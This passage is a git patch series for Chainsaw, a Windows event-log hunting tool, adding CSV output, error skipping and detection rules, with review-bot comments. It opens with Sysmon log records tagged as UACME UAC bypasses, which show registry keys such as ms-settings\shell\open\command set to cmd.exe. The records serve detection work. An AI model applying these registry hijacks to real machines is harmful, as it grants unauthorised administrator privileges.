"http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - EventType: DeleteValue - Image: "C:\\Windows\\explorer.exe" - 
ProcessGuid: 747F3D96-5808-5D45-0000-00106CDC3E00 - ProcessId: 924 - RuleName: PrivEsc - UAC bypass UACME-34 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\windir" - UtcTime: "2019-08-03 09:46:49.347" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 12 - EventRecordID: 5135 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 12 - TimeCreated_attributes: - SystemTime: "2019-08-03T09:46:49.436856Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: (Empty) - EventType: SetValue - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-5E6A-5D45-0000-001076639D00 - ProcessId: 4440 - RuleName: PrivEsc - UAC bypass UACME-33 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\ms-settings\\shell\\open\\command\\DelegateExecute" - UtcTime: "2019-08-03 10:14:02.848" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 5272 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-08-03T10:14:02.929209Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: "C:\\Windows\\system32\\cmd.exe" - EventType: SetValue - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-5E6A-5D45-0000-001076639D00 - ProcessId: 4440 - RuleName: PrivEsc - UAC bypass 
UACME-33 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\ms-settings\\shell\\open\\command\\(Default)" - UtcTime: "2019-08-03 10:14:02.848" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 5273 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-08-03T10:14:02.934826Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - EventType: DeleteKey - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-5E6A-5D45-0000-001076639D00 - ProcessId: 4440 - RuleName: PrivEsc - UAC bypass UACME-33 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\ms-settings\\shell\\open\\command" - UtcTime: "2019-08-03 10:14:08.503" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 12 - EventRecordID: 5278 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 12 - TimeCreated_attributes: - SystemTime: "2019-08-03T10:14:08.681363Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CreationUtcTime: "2019-08-03 10:51:46.599" - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-6742-5D45-0000-00104A66B500 - ProcessId: 6380 - RuleName: PrivEsc - UAC Bypass UACME 32 - TargetFilename: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\OskSupport.dll" - UtcTime: "2019-08-03 10:51:46.599" - 
System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 11 - EventRecordID: 5305 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 11 - TimeCreated_attributes: - SystemTime: "2019-08-03T10:51:46.647421Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: "c:\\Windows\\SysWOW64\\notepad.exe" - EventType: SetValue - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-9DB0-5D46-0000-00108243AF03 - ProcessId: 3580 - RuleName: PrivEsc - UAC bypass UACME-45 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\exefile\\shell\\open\\command\\(Default)" - UtcTime: "2019-08-04 08:56:16.635" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 5664 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-08-04T08:56:16.650581Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: "C:\\Windows\\system32\\cmd.exe" - EventType: SetValue - Image: "C:\\Windows\\system32\\reg.exe" - ProcessGuid: 747F3D96-A104-5D46-0000-001092A6BC03 - ProcessId: 2576 - RuleName: PrivEsc - UAC bypass UACME-53 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Folder\\shell\\open\\command\\(Default)" - UtcTime: "2019-08-04 09:10:29.025" - System: - Channel: 
Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 5698 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-08-04T09:10:29.060588Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - diff --git a/src/lib.rs b/src/lib.rs index 5ed06265..98bd7901 100644 --- a/src/lib.rs +++ b/src/lib.rs @@ -5,7 +5,7 @@ pub(crate) use anyhow::Result; pub use file::{evtx, get_files, Reader}; pub use hunt::{Detection, Hunter, HunterBuilder}; -pub use rule::{lint_rule, load_rule, Kind as RuleKind}; +pub use rule::{lint_rule, load_rule, sigma, Kind as RuleKind}; pub use search::{Searcher, SearcherBuilder}; pub use write::{set_writer, Format, Writer, WRITER}; diff --git a/src/rule/mod.rs b/src/rule/mod.rs index 9e11134f..b243bcbb 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -3,7 +3,7 @@ use std::str::FromStr; use serde::Deserialize; -pub use chainsaw::Rule; +pub use self::chainsaw::Rule; pub mod chainsaw; pub mod sigma; diff --git a/tests/convert.rs b/tests/convert.rs index eec03b08..95423d1c 100644 --- a/tests/convert.rs +++ b/tests/convert.rs @@ -3,7 +3,7 @@ use std::path::Path; use regex::Regex; use serde_yaml::Value as Yaml; -use chainsaw::convert::sigma; +use chainsaw::sigma; mod common; From 70a854819e0120aecec79e67ad1ca1019c098610 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Fri, 3 Jun 2022 00:04:03 +0100 Subject: [PATCH 03/77] feat: add csv support back into chainsaw --- src/cli.rs | 116 +++++++++++++++++++++++++++++++++++++++++++++++- src/file/mod.rs | 43 ++++++++++++++++-- src/main.rs | 65 +++++++++++++++++---------- src/write.rs | 5 +++ 4 files changed, 200 insertions(+), 29 deletions(-) 
diff --git a/src/cli.rs b/src/cli.rs index 1315bd49..099e049e 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -1,4 +1,5 @@ use std::collections::HashMap; +use std::fs; use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; use chrono_tz::Tz; @@ -8,6 +9,7 @@ use tau_engine::Document; use crate::hunt::{Detection, Detections, Kind, Mapping}; use crate::rule::Rule; +use crate::write::WRITER; #[cfg(not(windows))] pub const RULE_PREFIX: &str = "‣"; @@ -100,7 +102,7 @@ pub fn print_detections( .collect(); let rules: HashMap<_, _> = rules.iter().map(|r| (&r.tag, r)).collect(); - // Do a signle unfold... + // Do a single unfold... let mut grouped: HashMap< (&Option, &String), Vec<(&NaiveDateTime, &Kind, Vec<&String>)>, 
@@ -216,6 +218,118 @@ pub fn print_detections( } } +pub fn print_csv( + detections: &[Detections], + mappings: &[Mapping], + local: bool, + timezone: Option, +) -> crate::Result<()> { + let directory = unsafe { + WRITER + .path + .as_ref() + .expect("could not get output directory") + }; + fs::create_dir_all(directory)?; + let mappings: HashMap<_, HashMap<_, _>> = mappings + .iter() + .map(|m| (&m.name, m.groups.iter().map(|g| (&g.name, g)).collect())) + .collect(); + // Do a single unfold... + let mut grouped: HashMap< + (&Option, &String), + Vec<(&NaiveDateTime, &Kind, Vec<&String>)>, + > = HashMap::new(); + for detection in detections { + let mut tags: HashMap<(&Option, &String), (&NaiveDateTime, Vec<&String>)> = + HashMap::new(); + for hit in &detection.hits { + let tags = tags + .entry((&hit.mapping, &hit.group)) + .or_insert((&hit.timestamp, vec![])); + (*tags).1.push(&hit.tag); + } + for (k, v) in tags { + let grouped = grouped.entry(k).or_insert(vec![]); + (*grouped).push((&v.0, &detection.kind, v.1)); + } + } + let mut keys = grouped.keys().cloned().collect::>(); + keys.sort(); + for key in keys { + let mut grouped = grouped.remove(&key).expect("could not get grouped!"); + grouped.sort_by(|x, y| x.0.cmp(&y.0)); + // FIXME: Handle name clashes + let filename = format!("{}.csv", key.1.replace(" ", "_").to_lowercase()); + let path = directory.join(&filename); + let mut csv = prettytable::csv::Writer::from_path(path)?; + cs_eprintln!("[+] Created {}", filename); + let (mapping, group) = key; + if let Some(mapping) = mapping { + if let Some(groups) = mappings.get(mapping) { + let group = groups.get(&group).expect("could not get group!"); + let mut header = vec!["timestamp", "detections"]; + if let Some(default) = group.default.as_ref() { + for field in default { + header.push(field); + } + } else { + header.push("data"); + } + csv.write_record(header)?; + for (timestamp, kind, mut tags) in grouped { + tags.sort(); + let localised = if let Some(timezone) = 
timezone { + timezone + .from_local_datetime(timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else if local { + Utc.from_local_datetime(timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else { + DateTime::::from_utc(timestamp.clone(), Utc).to_rfc3339() + }; + let mut cells = vec![localised]; + cells.push( + tags.iter() + .map(|tag| format!("{}", tag.as_str())) + .collect::>() + .join(";"), + ); + let document = match kind { + Kind::Individual { document } => document, + _ => continue, + }; + if let Some(default) = group.default.as_ref() { + for field in default { + if let Some(value) = group + .fields + .get(field) + .and_then(|k| document.data.find(k)) + .and_then(|v| v.to_string()) + { + cells.push(value); + } else { + cells.push("".to_owned()); + } + } + } else { + let json = serde_json::to_string(&document.data) + .expect("could not serialise document"); + cells.push(json); + } + csv.write_record(cells)?; + } + } + } + } + Ok(()) +} + pub fn print_json( detections: &[Detections], rules: &[Rule], diff --git a/src/file/mod.rs b/src/file/mod.rs index e1562f13..21e35fac 100644 --- a/src/file/mod.rs +++ b/src/file/mod.rs 
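Review bot: In print_csv the writer obtained from `prettytable::csv::Writer::from_path(path)?` is never flushed explicitly; the csv writer flushes on drop but discards any I/O error at that point, so a failed write ends with "[+] Created …" already printed and a truncated file on disk. Add `csv.flush()?;` after the record loop, inside the `if let Some(groups)` branch, so the error propagates through the function's Result. The writer and the "[+] Created" message are also produced before the `if let Some(mapping) = mapping` and `mappings.get(mapping)` checks, so a key whose mapping is absent leaves an empty CSV that was reported as created; moving the `from_path` call and the message below those checks avoids that. The filename behind `// FIXME: Handle name clashes` is derived from `key.1` and passed straight to `directory.join`, so a group name containing a path separator or `..` would place the file outside the output directory, and two group names differing only in case or spacing overwrite each other's file; restricting the name to `[A-Za-z0-9_-]` and appending a counter on collision would address both.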
@@ -105,14 +105,49 @@ impl Reader { } } -pub fn get_files(path: &PathBuf, extension: &Option) -> crate::Result> { +pub fn get_files( + path: &PathBuf, + extension: &Option, + skip_errors: bool, +) -> crate::Result> { let mut files: Vec = vec![]; if path.exists() { - let metadata = fs::metadata(&path)?; + let metadata = match fs::metadata(&path) { + Ok(metadata) => metadata, + Err(e) => { + if skip_errors { + cs_eyellowln!("failed to get metadata for file - {}", e); + return Ok(files); + } else { + anyhow::bail!(e); + } + } + }; if metadata.is_dir() { - let directory = path.read_dir()?; + let directory = match path.read_dir() { + Ok(directory) => directory, + Err(e) => { + if skip_errors { + cs_eyellowln!("failed to read directory - {}", e); + return Ok(files); + } else { + anyhow::bail!(e); + } + } + }; for dir in directory { - files.extend(get_files(&dir?.path(), &extension)?); + let dir = match dir { + Ok(dir) => dir, + Err(e) => { + if skip_errors { + cs_eyellowln!("failed to enter directory - {}", e); + return Ok(files); + } else { + anyhow::bail!(e); + } + } + }; + files.extend(get_files(&dir.path(), &extension, skip_errors)?); } } else { if let Some(extension) = extension { diff --git a/src/main.rs b/src/main.rs index f09053b4..b5c9d59a 100644 --- a/src/main.rs +++ b/src/main.rs @@ -46,6 +46,9 @@ enum Command { /// Set the column width for the tabular output. #[structopt(long = "column-width", conflicts_with = "json")] column_width: Option, + /// Print the output in csv format. + #[structopt(group = "format", long = "csv", requires("output"))] + csv: bool, /// Only hunt through files with the provided extension. #[structopt(long = "extension")] extension: Option, 
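Review bot: In get_files the skip_errors arm for a failed directory entry does `return Ok(files);`, which abandons the rest of the directory listing after the first bad entry rather than skipping only that entry; inside the `for dir in directory` loop that arm should be `continue;` (the `return` is appropriate in the two earlier arms, where metadata or read_dir for the path itself failed). The function's closing lines are outside the hunk. Within the visible code the recursion follows symlinks via fs::metadata with no cycle guard, presumably a pre-existing limitation, but now that skip_errors swallows per-entry failures it is worth a `// NOTE: symlink loops are not detected` comment above the function.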
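Review bot: The new `csv` flag is placed in the `format` group, but the neighbouring `column_width` field keeps `conflicts_with = "json"` only, so `--csv --column-width N` is accepted and the width is silently ignored; the same presumably applies to the `metadata` flag in the next hunk, which also conflicts only with json. Changing those attributes to `conflicts_with_all = &["csv", "json"]` keeps the tabular-only options rejected for both machine formats. The enum continues outside the hunk, so whether `json` itself is a member of the `format` group cannot be seen here.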
@@ -67,7 +70,7 @@ enum Command { /// Apply addional metadata for the tablar output. #[structopt(long = "metadata", conflicts_with = "json")] metadata: bool, - /// The file to output to. + /// The file/directory to output to. #[structopt(short = "o", long = "output")] output: Option, /// Supress informational output. @@ -162,27 +165,38 @@ fn print_title() { ); } -fn init_writer(output: Option, json: bool, quiet: bool) -> crate::Result<()> { - let output = match &output { +fn init_writer(output: Option, csv: bool, json: bool, quiet: bool) -> crate::Result<()> { + let (path, output) = match &output { Some(path) => { - let file = match File::create(path) { - Ok(f) => f, - Err(e) => { - return Err(anyhow::anyhow!( - "Unable to write to specified output file - {} - {}", - path.display(), - e - )); - } - }; - Some(file) + if csv { + (Some(path.to_path_buf()), None) + } else { + let file = match File::create(path) { + Ok(f) => f, + Err(e) => { + return Err(anyhow::anyhow!( + "Unable to write to specified output file - {} - {}", + path.display(), + e + )); + } + }; + (None, Some(file)) + } } - None => None, + None => (None, None), + }; + let format = if csv { + Format::Csv + } else if json { + Format::Json + } else { + Format::Std }; - let format = if json { Format::Json } else { Format::Std }; let writer = Writer { format, output, + path, quiet, }; set_writer(writer).expect("could not set writer"); @@ -201,6 +215,7 @@ fn run() -> Result<()> { load_unknown, column_width, + csv, extension, from, full, @@ -213,7 +228,7 @@ fn run() -> Result<()> { timezone, to, } => { - init_writer(output, json, quiet)?; + init_writer(output, csv, json, quiet)?; if !opts.no_banner { print_title(); } @@ -226,7 +241,7 @@ fn run() -> Result<()> { let mut count = 0; let mut rs = vec![]; for path in &rules { - for file in get_files(path, &None)? { + for file in get_files(path, &None, skip_errors)? { match load_rule(&RuleKind::Sigma, &file) { Ok(mut r) => { count += 1; 
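Review bot: In init_writer the csv branch stores the output path without touching it, whereas the file branch fails early on `File::create`; an unwritable or file-backed output directory is therefore only discovered in print_csv after the whole hunt has completed. Checking the directory up front in that branch, e.g. `std::fs::create_dir_all(path).map_err(|e| anyhow::anyhow!("Unable to create output directory - {} - {}", path.display(), e))?;` before `(Some(path.to_path_buf()), None)`, matches the existing error style and fails before any work is done. print_csv can keep its own `create_dir_all`, which then becomes a no-op.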
@@ -266,7 +281,7 @@ fn run() -> Result<()> { let hunter = hunter.build()?; let mut files = vec![]; for path in &path { - files.extend(get_files(path, &extension)?); + files.extend(get_files(path, &extension, skip_errors)?); } let mut detections = vec![]; let pb = cli::init_progress_bar(files.len() as u64, "Hunting".to_string()); @@ -276,7 +291,9 @@ fn run() -> Result<()> { pb.inc(1); } pb.finish(); - if json { + if csv { + cli::print_csv(&detections, hunter.mappings(), local, timezone)?; + } else if json { cli::print_json(&detections, hunter.rules(), local, timezone)?; } else { cli::print_detections( @@ -297,14 +314,14 @@ fn run() -> Result<()> { ); } Command::Lint { path, kind } => { - init_writer(None, false, false)?; + init_writer(None, false, false, false)?; if !opts.no_banner { print_title(); } cs_eprintln!("[+] Validating supplied detection rules..."); let mut count = 0; let mut failed = 0; - for file in get_files(&path, &None)? { + for file in get_files(&path, &None, false)? { if let Err(e) = lint_rule(&kind, &file) { failed += 1; cs_eprintln!("[!] {}", e); @@ -338,7 +355,7 @@ fn run() -> Result<()> { timezone, to, } => { - init_writer(output, json, quiet)?; + init_writer(output, false, json, quiet)?; if !opts.no_banner { print_title(); } @@ -359,7 +376,7 @@ fn run() -> Result<()> { } let mut files = vec![]; for path in &paths { - files.extend(get_files(path, &extension)?); + files.extend(get_files(path, &extension, skip_errors)?); } let mut searcher = Searcher::builder() .ignore_case(ignore_case) diff --git a/src/write.rs b/src/write.rs index 9e107b96..16666cee 100644 --- a/src/write.rs +++ b/src/write.rs @@ -1,15 +1,18 @@ use std::fs::File; +use std::path::PathBuf; use anyhow::Result; pub static mut WRITER: Writer = Writer { format: Format::Std, output: None, + path: None, quiet: false, }; pub enum Format { Std, + Csv, Json, } 
@@ -22,6 +25,7 @@ impl Default for Format { pub struct Writer { pub format: Format, pub output: Option, + pub path: Option, pub quiet: bool, } @@ -30,6 +34,7 @@ impl Default for Writer { Self { format: Format::Std, output: None, + path: None, quiet: false, } } From fe04fe4c06e0d833a5de74f3d5a5069f6ad5ea56 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Fri, 3 Jun 2022 00:04:27 +0100 Subject: [PATCH 04/77] build: bump to v2.0.0-alpha.1 --- Cargo.toml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Cargo.toml b/Cargo.toml index 5fdc826b..b56af3d9 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "chainsaw" -version = "2.0.0-alpha.0" +version = "2.0.0-alpha.1" repository = "https://github.com/countercept/chainsaw" description = "Rapidly Search and Hunt Through Windows Event Logs" authors = ["James Dorgan ","Alex Kornitzer "] From 49881094a841d5dc3984a0ac3f697e17cd3a2d04 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Fri, 3 Jun 2022 00:15:48 +0100 Subject: [PATCH 05/77] build: add in the lock changes --- Cargo.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Cargo.lock b/Cargo.lock index 9908a99d..4de6f70a 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -156,7 +156,7 @@ checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "chainsaw" -version = "2.0.0-alpha.0" +version = "2.0.0-alpha.1" dependencies = [ "aho-corasick 0.7.18", "anyhow", From c428820494979d5f5f89fc9b1e989f63d7ddb839 Mon Sep 17 00:00:00 2001 
From: Alex Kornitzer Date: Sat, 4 Jun 2022 19:52:54 +0100 Subject: [PATCH 06/77] feat: add initial support for chainsaw rules --- Cargo.lock | 32 +- Cargo.toml | 1 + mappings/sigma-event-logs.yml | 296 +++++++---- rules/account_tampering/new_user_created.yml | 27 + .../user_added_to_global_group.yml | 34 ++ .../user_added_to_local_group.yml | 34 ++ .../user_added_to_universal_group.yml | 34 ++ rules/antivirus/f-secure.yml | 41 ++ rules/antivirus/kaspersky.yml | 29 + rules/antivirus/sophos.yml | 29 + rules/antivirus/windows_defender.yml | 29 + rules/lateral_movement/batch_logon.yml | 39 ++ rules/lateral_movement/interactive_logon.yml | 39 ++ rules/lateral_movement/network_logon.yml | 39 ++ rules/lateral_movement/rdp_logon.yml | 39 ++ rules/lateral_movement/service_logon.yml | 39 ++ rules/lateral_movement/unlock_logon.yml | 38 ++ .../security_audit_log_was_cleared.yml | 30 ++ .../log_tampering/system_log_was_cleared.yml | 30 ++ rules/login_attacks/account_brute_force.yml | 34 ++ rules/service_tampering/event_log.yml | 29 + src/cli.rs | 459 ++++++++++------ src/ext/tau.rs | 34 +- src/file/evtx.rs | 34 -- src/file/mod.rs | 17 + src/hunt.rs | 503 ++++++++++++------ src/lib.rs | 2 +- src/main.rs | 22 +- src/rule/chainsaw.rs | 204 ++++++- src/rule/mod.rs | 111 +++- src/rule/sigma.rs | 15 + src/rule/stalker.rs | 33 +- src/search.rs | 3 + 33 files changed, 1855 insertions(+), 524 deletions(-) create mode 100644 rules/account_tampering/new_user_created.yml create mode 100644 rules/account_tampering/user_added_to_global_group.yml create mode 100644 rules/account_tampering/user_added_to_local_group.yml create mode 100644 rules/account_tampering/user_added_to_universal_group.yml create mode 100644 rules/antivirus/f-secure.yml create mode 100644 rules/antivirus/kaspersky.yml create mode 100644 rules/antivirus/sophos.yml create mode 100644 rules/antivirus/windows_defender.yml create mode 100644 rules/lateral_movement/batch_logon.yml create mode 100644 
rules/lateral_movement/interactive_logon.yml create mode 100644 rules/lateral_movement/network_logon.yml create mode 100644 rules/lateral_movement/rdp_logon.yml create mode 100644 rules/lateral_movement/service_logon.yml create mode 100644 rules/lateral_movement/unlock_logon.yml create mode 100644 rules/log_tampering/security_audit_log_was_cleared.yml create mode 100644 rules/log_tampering/system_log_was_cleared.yml create mode 100644 rules/login_attacks/account_brute_force.yml create mode 100644 rules/service_tampering/event_log.yml diff --git a/Cargo.lock b/Cargo.lock index 4de6f70a..c39bbc6d 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -174,6 +174,7 @@ dependencies = [ "serde_yaml", "structopt", "tau-engine", + "uuid", ] [[package]] @@ -527,6 +528,17 @@ dependencies = [ "wasi 0.9.0+wasi-snapshot-preview1", ] +[[package]] +name = "getrandom" +version = "0.2.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9be70c98951c83b8d2f8f60d7065fa6d5146873094452a1008da8c2f1e4205ad" +dependencies = [ + "cfg-if", + "libc", + "wasi 0.10.0+wasi-snapshot-preview1", +] + [[package]] name = "glob" version = "0.3.0" @@ -923,7 +935,7 @@ version = "0.3.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "de0737333e7a9502c789a36d7c7fa6092a49895d4faa31ca5df163857ded2e9d" dependencies = [ - "getrandom", + "getrandom 0.1.16", "redox_syscall 0.1.57", "rust-argon2", ] @@ -1151,9 +1163,9 @@ dependencies = [ [[package]] name = "syn" -version = "1.0.95" +version = "1.0.96" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fbaf6116ab8924f39d52792136fb74fd60a80194cf1b1c6ffa6453eef1c3f942" +checksum = "0748dd251e24453cb8717f0354206b91557e4ec8703673a4b30208f2abaf1ebf" dependencies = [ "proc-macro2", "quote", 
@@ -1162,9 +1174,9 @@ dependencies = [ [[package]] name = "tau-engine" -version = "1.4.0" +version = "1.4.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e01789704e01baf9d6b0e677648e6bf52b7ba7192c9201dd426f02ab6d493f9f" +checksum = "f32fcbd3e364cb39fac2f5753f3b21df0dcf246eacec2953453400fad64c9db8" dependencies = [ "aho-corasick 0.7.18", "lazy_static", @@ -1339,6 +1351,16 @@ version = "1.0.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7fcfc827f90e53a02eaef5e535ee14266c1d569214c6aa70133a624d8a3164ba" +[[package]] +name = "uuid" +version = "1.1.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c6d5d669b51467dcf7b2f1a796ce0f955f05f01cafda6c19d6e95f730df29238" +dependencies = [ + "getrandom 0.2.6", + "serde", +] + [[package]] name = "vec_map" version = "0.8.2" diff --git a/Cargo.toml b/Cargo.toml index b56af3d9..e8d33b64 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -25,6 +25,7 @@ serde_json = "1.0" serde_yaml = "0.8" structopt = "0.3" tau-engine = { version = "1.0", features = ["core", "json"] } +uuid = { version = "1.1", features = ["serde", "v4"] } [dev-dependencies] diff --git a/mappings/sigma-event-logs.yml b/mappings/sigma-event-logs.yml index a33db3b4..8d6d1c3d 100644 --- a/mappings/sigma-event-logs.yml +++ b/mappings/sigma-event-logs.yml 
@@ -14,153 +14,231 @@ groups: - name: Suspicious Process Creation timestamp: Event.System.TimeCreated filter: - - Event.System.EventID: 1 - Event.System.Provider: Microsoft-Windows-Sysmon + EventID: 1 + Provider: Microsoft-Windows-Sysmon fields: - CommandLine: Event.EventData.CommandLine - Computer: Event.System.Computer - EventID: Event.System.EventID - Image: Event.EventData.Image - OriginalFileName: Event.EventData.OriginalFileName - ParentCommandLine: Event.EventData.ParentCommandLine - ParentImage: Event.EventData.ParentImage - default: - - EventID - - Computer - - Image - - CommandLine + - from: Provider + to: Event.System.Provider + visible: false + - name: Event ID + from: EventID + to: Event.System.EventID + - name: Computer + from: Computer + to: Event.System.Computer + - name: Image + from: Image + to: Event.EventData.Image + - name: Command Line + from: CommandLine + to: Event.EventData.CommandLine + - name: Original File Name + from: OriginalFileName + to: Event.EventData.OriginalFileName + - name: Parent Image + from: ParentImage + to: Event.EventData.ParentImage + - name: Parent Command Line + from: ParentCommandLine + to: Event.EventData.ParentCommandLine - name: Suspicious Network Connection timestamp: Event.System.TimeCreated filter: - - Event.System.EventID: 3 - Event.System.Provider: Microsoft-Windows-Sysmon + EventID: 3 + Provider: Microsoft-Windows-Sysmon fields: - Computer: Event.System.Computer - DestinationIp: Event.EventData.DestinationIp - DestinationHostname: Event.EventData.DestinationHostname - DestinationPort: Event.EventData.DestinationPort - DestinationIsIpv6: Event.EventData.DestinationIsIpv6 - EventID: Event.System.EventID - Image: Event.EventData.Image - Initiated: Event.EventData.Initiated - SourcePort: Event.EventData.SourcePort - User: Event.EventData.User - default: - - EventID - - Computer - - Image - - DestinationIp - - DestinationPort + - from: Provider + to: Event.System.Provider + visible: false + - name: Event ID + 
from: EventID + to: Event.System.EventID + - name: Computer + from: Computer + to: Event.System.Computer + - name: User + from: User + to: Event.EventData.User + - name: Image + from: Image + to: Event.EventData.Image + - name: Destination IP + from: DestinationIp + to: Event.EventData.DestinationIp + - name: Destination Port + from: DestinationPort + to: Event.EventData.DestinationPort + - name: Destination Hostname + from: DestinationHostname + to: Event.EventData.DestinationHostname + - name: Destination Is IPv6 + from: DestinationIsIpv6 + to: Event.EventData.DestinationIsIpv6 + visible: false + - name: Initiated + from: Initiated + to: Event.EventData.Initiated + - name: Source Port + from: SourcePort + to: Event.EventData.SourcePort - name: Suspicious Image Load timestamp: Event.System.TimeCreated filter: - - Event.System.EventID: 7 - Event.System.Provider: Microsoft-Windows-Sysmon + EventID: 7 + Provider: Microsoft-Windows-Sysmon fields: - Computer: Event.System.Computer - EventID: Event.System.EventID - Image: Event.EventData.Image - ImageLoaded: Event.EventData.ImageLoaded - default: - - EventID - - Computer - - Image - - ImageLoaded + - from: Provider + to: Event.System.Provider + visible: false + - name: Event ID + from: EventID + to: Event.System.EventID + - name: Computer + from: Computer + to: Event.System.Computer + - name: Image + from: Image + to: Event.EventData.Image + - name: Image Loaded + from: ImageLoaded + to: Event.EventData.ImageLoaded - name: Suspicious File Creation timestamp: Event.System.TimeCreated filter: - - Event.System.EventID: 11 - Event.System.Provider: Microsoft-Windows-Sysmon + EventID: 11 + Provider: Microsoft-Windows-Sysmon fields: - Computer: Event.System.Computer - EventID: Event.System.EventID - Image: Event.EventData.Image - TargetFilename: Event.EventData.TargetFilename - default: - - EventID - - Computer - - TargetFilename - - Image + - from: Provider + to: Event.System.Provider + visible: false + - name: Event ID + 
